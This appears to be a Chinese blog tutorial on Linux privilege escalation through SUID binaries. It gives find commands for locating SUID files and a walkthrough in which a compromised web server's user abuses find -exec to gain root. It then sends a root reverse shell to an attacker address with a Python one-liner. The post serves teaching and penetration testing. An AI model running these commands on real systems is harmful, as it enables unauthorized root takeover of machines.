Linux下用SUID提权
Linux 提权 下用
2023-09-11 14:14:04 时间
关于SUID详细:Linux下的用户、组和权限
SUID可以让调用者以文件拥有者的身份运行该文件,所以我们利用SUID提权的思路就是运行root用户所拥有的SUID的文件,那么我们运行该文件的时候就得获得root用户的身份了。
已知的可用来提权的linux可行性的文件列表如下:
- nmap
- vim
- find
- bash
- more
- less
- nano
- cp
以下命令可以发现系统上运行的所有SUID可执行文件。
#以下命令将尝试查找具有root权限的SUID的文件,不同系统适用于不同的命令,一个一个试
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000-print2>/dev/null
find / -user root -perm -4000-exec ls -ldb {} \;
利用find文件提权
假如我们现在拿到了一个网站服务器的shell,但是权限是ubuntu,我们现在需要提权到 root 用户权限。
我们查看具有root用户权限的SUID文件
find / -perm -u=s -type f 2>/dev/null
我们随便找一个命令进行利用,我们就找find,先查看其信息,发现其确实是root用户权限的SUID的文件
我们先看一下是否能用find命令以root权限运行,发现确实可以以root权限运行
/usr/bin/find examples.desktop -exec whoami \;
然后我们查看目标网站上是否有python环境,可以看到有python2.7.6的环境
于是我们以root用户的身份利用python反弹shell,
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.25",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' #反弹一个sh类型的shell
可以看到,在攻击端收到了反弹过来的shell,并且是root身份
相关文章
- linux 解决docker、docker-compose命令权限问题(sudo)
- Linux提权中常见命令大全
- [Linux] linux文件系统学习
- [Linux] AWK命令详解(大全)
- 【Linux】object '/lib/libcwait.so' from /etc/ld.so.preload
- Linux 客户端访问 NFS报Permission Denied错误
- windows or linux 64位安装ta-lib包
- 【学习总结】快速上手Linux玩转典型应用-第6章-linux常用命令讲解
- 重新点亮linux 命令树————文件权限和目录权限[九]
- Linux基础之查看linux发行版以及内核版本
- Linux备份全攻略(原创)
- Linux ln指令
- 【Linux 网络编程】TCP poll聊天程序
- 【Linux 内核】调度器 ⑧ ( 进程优先级源码 includelinuxschedprio.h | 进程分类 | 实时进程 | 普通进程 | 进程优先级数值 | 0 ~ 99 实时进程 )
- 【Linux】linux经常使用基本命令
- L77.linux命令每日一练 -- 第11章 Linux系统管理命令 -- vmstat和mpstat
- L72.linux命令每日一练 -- 第十章 Linux网络管理命令 -- mail和nslookup
- L69.linux命令每日一练 -- 第十章 Linux网络管理命令 -- arpping和telnet
- L47.linux命令每日一练 -- 第七章 Linux用户管理及用户信息查询命令 -- users和whoami
- L32.linux命令每日一练 -- 第五章 Linux信息显示与搜索文件命令 -- dmesg和stat
- L17.linux命令每日一练 -- 第三章 文件过滤及内容编辑处理命令 -- more和less命令
- L2.linux命令每日一练 -- 第一章 Linux命令行简介
- L1.linux命令每日一练 -- 第一章 Linux命令行简介
- linux 下 c++ clock 函数理解
- linux 查看文件命令总结
- Linux多网卡7种bond模式
- Linux- 系统随你玩之--grep查找文件内容
- Linux系列 linux 常用命令(笔记)
- LEADTOOLS SDK 22.0 for Linux Crack
- 02 linux下,vi文本编辑器基本命令